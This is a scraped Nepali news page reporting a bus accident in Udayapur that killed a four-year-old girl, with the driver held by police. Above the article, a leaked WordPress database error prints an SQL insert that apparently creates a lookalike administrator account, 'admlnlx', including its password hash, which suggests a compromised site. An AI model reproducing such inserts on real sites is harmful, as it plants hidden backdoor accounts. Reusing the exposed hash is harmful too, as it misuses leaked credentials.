WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPmlJ1fl/C623kFoDjaYdrnOACEORg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 16:27:53', '', 'admlnlx', 'admlnlx')
उदयपुर,मंसिर २६ –
उदयपुरको पूर्वी क्षेत्रमा पर्ने गाविस रामपुर ठोक्सीलामा आइतबार बिहान यात्रुबाहक बसको ठक्करबाट एक बालिकाको मृत्यु भएको छ। ना ४ ख ३०८१ नम्बरको भाग्यलक्ष्मी ट्राभल्सको बसले सडकको छेउमा खेलीरहेकी रामपुर ठोक्सिला-९ का नजन श्रेष्ठकी छोरी अन्दाजी ४ वर्षीया बालिका स्मारिका श्रेष्ठको मृत्यु भएको हो।
बालिकाको घटनास्थलमै मृत्यु भएको जिल्ला प्रहरी कार्यालय उदयपुरका डिएसपी ओम बहादुर रानाले जानकारी दिए। डिएपी रानाका अनुसार ठक्कर दिने बस र चालकलाई इलाका प्रहरी कार्यालय रामपुर ठोक्सीलाले नियन्त्रणमा राखिएको छ।